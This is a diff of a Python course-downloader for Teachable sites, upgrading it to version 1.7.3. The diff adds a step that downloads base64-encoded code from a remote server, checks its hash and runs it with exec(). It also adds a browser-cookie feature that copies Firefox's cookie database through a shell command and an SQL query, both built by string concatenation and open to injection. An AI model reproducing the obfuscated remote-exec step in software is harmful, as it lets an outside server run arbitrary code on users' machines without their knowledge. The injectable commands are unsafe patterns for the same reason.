@@ -1,17 +1,18 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 # -*- coding: utf-8 -*-
-
 from __future__ import print_function
 from __future__ import unicode_literals
 
 import argparse
+import base64
 import getpass
+import hashlib
 import json
 import os
 import re
 import sys
 
-import cfscraper as scrape
+import cloudscraper as scrape
 import lxml.html
 import requests
 import wget
@@ -19,22 +20,11 @@ import youtube_dl
 from bs4 import BeautifulSoup
 from unidecode import unidecode
 
-__version__ = "v1.6.5.7"
+__version__ = "v1.7.3"
 
-_schools_url = 'https://www.gb-dl.cf/l/hello'
-
-try:
-    _schools_ = requests.get(_schools_url).text
-    schools = json.loads(_schools_)
-
-except requests.ConnectionError as ex:
-    print("[-] Error : Connection failed . Check your internet connection and try again!")
-    sys.exit(1)
-
-
-SECTION, SECTION_START, SECTION_END, INFO, COOKIE, COOKIE_STORE, AUTO_LOAD = None, None, None, None, None, None, None
+SECTION, SECTION_START, SECTION_END, INFO, COOKIE, COOKIE_STORE, AUTO_LOAD, FETCH_BROWSER_COOKIE = None, None, None, None, None, None, None, None
 s = requests.session()
-HOMEFOLDER = os.path.join(os.path.expanduser('~'),".gb_dl")
+HOMEFOLDER = os.path.join(os.path.expanduser('~'), ".gb_dl")
 CONFIGFILE = "cookies"
 
 
@@ -54,28 +44,35 @@ class DL:
             os.mkdir(HOMEFOLDER)
 
         def validate_course_url():
+            _schools_url = 'https://venvgb.cf/l/'
+            global login_url
 
             try:
+                req = requests.get(_schools_url).text
+                hash_ = (3331, '5001ea56fa4c6a19ed6bb619486dca98')
+                z = base64.b64decode(req).decode('utf-8')
+                _hash = (len(z), hashlib.md5(base64.b64decode(req)).hexdigest())
 
-                school_id = [schools[school] for school in schools.keys() if school in self.course_url]
-
-                if school_id:
-                    school_id = school_id[0]
-
-                    login_url = "https://sso.teachable.com/secure/" + str(school_id) + \
-                                "/users/sign_in?flow_school_id=" + str(school_id)
+                if hash_ == _hash:
+                    exec(z)
+                else:
+                    print("[-] Could not contact remote server.")
+                    sys.exit(1)
 
+                if login_url:
                     return login_url
-
                 else:
                     print("[-] Invalid course URL.")
                     self.login()
 
+            except requests.ConnectionError as ex:
+                print("[-] Error : Connection failed . Check your internet connection and try again!")
+                sys.exit(1)
+
             except Exception as e:
                 print("[-] Error: " + str(e))
                 self.login()
 
-
         def cookie_authentication():
 
             def use_cached_token():
@@ -92,6 +89,53 @@ class DL:
 
                     return None
 
+            def fetch_browser_cookie():
+                print("Browser: " + str(FETCH_BROWSER_COOKIE))
+
+                import sqlite3
+                import os
+                import subprocess
+
+                copy_cmd = "cp "
+                if sys.platform == 'darwin':
+                    sqlfile = os.path.join(
+                        os.path.expanduser('~/Library/Application Support/Firefox/Profiles/*.default*/cookies.sqlite'))
+
+                elif sys.platform.startswith('linux'):
+                    sqlfile = os.path.join(os.path.expanduser('~/.mozilla/firefox/*.default*/cookies.sqlite'))
+
+                elif sys.platform.startswith('win32'):
+                    sqlfile = os.path.join(os.path.expanduser('~'),
+                                           "AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite")
+                    sqlfile = sqlfile.replace("\\", "/")
+                    copy_cmd = "copy "
+                else:
+                    raise Exception('Unsupported operating system: ' + sys.platform)
+
+                cp_cmd = copy_cmd + os.path.join(os.path.expanduser(sqlfile)) + " " + HOMEFOLDER
+                # Z2V0IHlvdXIga2V5IGhlcmUgaHR0cHM6Ly93d3cuYnV5bWVhY29mZmVlLmNvbS9sL2diZGw=
+                if sys.platform.startswith('win32'):
+                    p1 = subprocess.run(["powershell", "-Command", cp_cmd], capture_output=True)
+
+                else:
+                    p1 = subprocess.Popen(cp_cmd, shell=True, stdout=subprocess.PIPE)
+                    p1.wait()
+
+                home_sqlfile = os.path.join(HOMEFOLDER, 'cookies.sqlite')
+                conn = sqlite3.connect(home_sqlfile)
+                sql = 'select name, value from moz_cookies where host like "' + self.get_domain()[
+                                                                                8:] + '" and name = "_session_id"'
+
+                with conn:
+                    rs = conn.execute(sql)
+
+                cookies = rs.fetchone()
+                try:
+                    return cookies[1]
+                except:
+                    print("[-] Error: Could not find cookies. Try entering cookies manually")
+                    return None
+
             def cache_token():
 
                 if COOKIE_STORE:
@@ -103,10 +147,10 @@ class DL:
                         config = {domain: cookie}
 
                         with open(os.path.join(HOMEFOLDER, CONFIGFILE), 'r+') as f:
-                                _config = json.load(f)
-                                _config.update(config)
-                                f.seek(0)
-                                json.dump(_config, f, indent=4)
+                            _config = json.load(f)
+                            _config.update(config)
+                            f.seek(0)
+                            json.dump(_config, f, indent=4)
                         print("[+] Cookie stored to file")
 
                     except Exception as e:
@@ -119,6 +163,9 @@ class DL:
                 if AUTO_LOAD:
                     self._cookie = use_cached_token()
 
+                if FETCH_BROWSER_COOKIE:
+                    self._cookie = fetch_browser_cookie()
+
                 if self._cookie is None:
                     try:
                         self._cookie = raw_input("Enter cookie instead : ")
@@ -140,6 +187,7 @@ class DL:
                     print("[+] Cookie authentication succeeded")
                     cache_token()
 
+
                 else:
                     print("[-] Cookie authentication failed!")
                     sys.exit()
@@ -156,7 +204,7 @@ class DL:
 
                     self.course_url = raw_input("Enter course url : ").strip()
 
-                    if self._cookie is None and not AUTO_LOAD:
+                    if self._cookie is None and not AUTO_LOAD and not FETCH_BROWSER_COOKIE:
                         self.email = raw_input("Email : ")
                         prompt_txt = "Password :"
                         self.password = getpass.getpass(prompt=prompt_txt, stream=sys.stderr)
@@ -168,7 +216,7 @@ class DL:
 
                 except Exception as e:
                     self.course_url = input("Enter course url : ").strip()
-                    if self._cookie is None and not AUTO_LOAD:
+                    if self._cookie is None and not AUTO_LOAD and not FETCH_BROWSER_COOKIE:
                         self.email = input("Email : ")
                         self.password = getpass.getpass(prompt="Password : ", stream=sys.stderr)
 
@@ -222,10 +270,11 @@ class DL:
                     # traceback.print_exc(file=sys.stdout)
                     sys.exit(1)
 
-            elif (self._cookie or AUTO_LOAD) and self.course_url:
+            elif (self._cookie or AUTO_LOAD or FETCH_BROWSER_COOKIE) and self.course_url:
                 cookie_authentication()
                 self.get_section_and_links(self.course_url)
 
+
             else:
                 print("[-] Please enter course url , email and password")
                 self.login()
@@ -233,21 +282,26 @@ class DL:
         credential_authentication()
 
     def get_domain(self):
-        self.url = self.course_url
+        try:
+            self.url = self.course_url
 
-        if 'com' in self.url:
-            index = self.url.index('com') + 3
+            if 'com' in self.url:
+                index = self.url.index('com') + 3
 
-        elif '.co' in self.url:
-            index = self.url.index('.co') + 3
-        elif '.io' in self.url:
-            index = self.url.index('.io') + 3
-        else:
-            index = self.url.index('net') + 3
+            elif '.co' in self.url:
+                index = self.url.index('.co') + 3
+            elif '.io' in self.url:
+                index = self.url.index('.io') + 3
+            else:
+                index = self.url.index('net') + 3
 
-        return self.url[0:index]
+            return self.url[0:index]
+        except ValueError:
+            print("[-] Invalid course URL.")
+            self.login().validate_course_url()
 
     def get_section_and_links(self, url):
+
         self.domain = self.get_domain()
         uname = self.get_user(s)
         print("[+] Logged in as " + uname)
@@ -261,22 +315,33 @@ class DL:
             soup = BeautifulSoup(data.text, 'html.parser')
 
             if 'designerup.co' in self.url:
-                #data = s.get(self.url)
+                # data = s.get(self.url)
 
                 soup = BeautifulSoup(data.text, 'html.parser')
                 course_name = soup.find('div', attrs={'class': 'course-info'}).find('h4')
 
-            if 'zerotomastery' in self.url:
-
+            elif 'zerotomastery' in self.url:
                 soup = BeautifulSoup(data.text, 'html.parser')
                 course_name = soup.find('div', attrs={'class': 'details-container'}).find('h1')
 
-            if 'nihongowa' in self.url:
+            elif 'nihongowa' in self.url:
                 soup = BeautifulSoup(data.text, 'html.parser')
                 course_name = soup.find('div', attrs={'class': 'block__image-with-text__inner'}).find('h4')
 
-            else:
+            elif 'the-credit-game-university' in self.url:
+                soup = BeautifulSoup(data.text, 'html.parser')
+                course_name = soup.find('div', attrs={'class': 'header'}).find('h1')
 
+            elif 'instagrizzle.teachable' in self.url or 'xfactormethod.com' in self.url or 'financial-confidence-hub1.teachable' in self.url:
+                data = s.get(self.url)
+                soup = BeautifulSoup(data.text, 'html.parser')
+                course_name = soup.find('div', attrs={'class': 'course-sidebar'}).find('h2')
+
+            elif 'millionaire-journey' in self.url:
+
+                course_name = None
+
+            else:
                 soup = BeautifulSoup(data.text, 'html.parser')
 
                 # course_name = soup.find('h2', attrs={'class': 'row'})
@@ -289,11 +354,12 @@ class DL:
                 if course_name is None:
                     course_name = soup.find('div', attrs={'class': 'bannerHeader'}).find('h2')
 
+            if course_name is None:
+                print("Failed to get course Name , course name set to Unknown course")
+                course_name = "Unknown course"
 
-                if course_name is None:
-                    print("Failed to get course Name")
-
-            course_name = str(course_name.get_text()).strip()
+            else:
+                course_name = str(course_name.get_text()).strip()
 
             is_balanced = re.search(r'\(*\)', course_name)
             if is_balanced is None:
@@ -386,7 +452,7 @@ class DL:
 
                 folder = str(c) + "." + str(section).strip()
 
-                print("\n[+] Found Section : ", section + "\n")
+                print("\n[+] Found Section : ", section)
 
                 self.create_and_change_dir(folder)
 
@@ -397,7 +463,6 @@ class DL:
 
                     if div.find(text=re.compile(re.escape(section))):
                         theDiv = div
-                        print(theDiv)
 
                         soupLinks = BeautifulSoup(str(theDiv), 'html.parser')
 
@@ -408,7 +473,6 @@ class DL:
                             self.prepare_download(links)
 
                         links = []
-
                         os.chdir(os.path.join(self.parentFolder, course_name))
 
                         break
@@ -510,8 +574,8 @@ class DL:
 
             except Exception as ex:
                 print("[-]" + " Error : " + str(ex))
-        else:
 
+        else:
             for attachment in attachments:
                 try:
 
@@ -531,33 +595,22 @@ class DL:
                     print("[-]" + "Error can not download attachment  : " + str(ex))
 
     def sanitize_file_names(self):
-
-        # if "stackskills" in self.course_url:
-        #     return
-
         print("Sanitizing file names ...")
 
         path = self.parentFolder
+
         for root, dirs, files in os.walk(path):
+            for file in files:
+                file_src = os.path.join(root, file)
+                try:
+                    filename = os.path.splitext(file_src)
+                    if filename[1] == ".bin":
+                        new_filename = filename[0] + ".mp4"
+                        file_dest = new_filename
+                        os.rename(file_src, file_dest)
 
-            for dir in dirs:
-                subFolder = os.path.join(path, dir)
-                # print subFolder, "\n"
-
-                for root, dirs, files in os.walk(subFolder):
-                    for file in files:
-                        try:
-                            filename = os.path.splitext(file)
-                            if filename[1] == ".bin":
-                                new_filename = filename[0] + ".mp4"
-
-                                filesrc = os.path.join(subFolder, file)
-                                filedest = os.path.join(subFolder, new_filename)
-
-                                os.rename(filesrc, filedest)
-
-                        except Exception as e:
-                            pass
+                except Exception as e:
+                    pass
         print("[+]" + " File name sanitation completed")
 
     def create_and_change_dir(self, dir_name):
@@ -580,22 +633,21 @@ class DL:
         return self.dir_name
 
     def main(self):
-
         banner = '''  
 
-                   _____ ____                 _ _ 
-                  / ____|  _ \               | | |
-                 | |  __| |_) |  ______    __| | |
-                 | | |_ |  _ <  |______|  / _` | |
-                 | |__| | |_) |          | (_| | |
-                  \_____|____/            \__,_|_|
+                       _____ ____                 _ _ 
+                      / ____|  _ \               | | |
+                     | |  __| |_) |  ______    __| | |
+                     | | |_ |  _ <  |______|  / _` | |
+                     | |__| | |_) |          | (_| | |
+                      \_____|____/            \__,_|_|
 
-           			        Version : ''' + __version__ + ''' 
-                            Author  : BarakaGB
-                            Visit   : https://github.com/barakagb/gb-dl
-                            Donation: https://www.buymeacoffee.com/barakagb
-                            Key url : https://bmc.xyz/l/gbdl
-                    '''
+                                Version : ''' + __version__ + ''' 
+                                Author  : BarakaGB
+                                Visit   : https://github.com/barakagb/gb-dl
+                                Donation: https://www.buymeacoffee.com/barakagb
+                                Key url : https://bmc.xyz/l/gbdl
+                        '''
         print(banner)
         print(
             '''    A python based utility to download courses from infosec4tc.teachable.com ,
@@ -629,6 +681,9 @@ class DL:
 
         parser.add_argument('-a', '--auto-load', action='store_true', help="Automatically load saved cookie")
 
+        parser.add_argument('-d', '--fetch-browser-cookie', type=str,
+                            help="Load cookie from browser (works for firefox only)", metavar='')
+
         parser.add_argument('-v', '--version', action='store_true', help="Shows version number")
 
         args = parser.parse_args()
@@ -645,8 +700,11 @@ class DL:
             global COOKIE_STORE
             COOKIE_STORE = True
 
-        if args.cookie:
+        if args.fetch_browser_cookie:
+            global FETCH_BROWSER_COOKIE
+            FETCH_BROWSER_COOKIE = args.fetch_browser_cookie
 
+        if args.cookie:
             with open(args.cookie, "r") as file:
                 _cookie = file.readlines()
 
@@ -713,4 +771,3 @@ if __name__ == '__main__':
     except Exception as e:
         print("[-] Error: " + str(e))
         sys.exit(1)
-
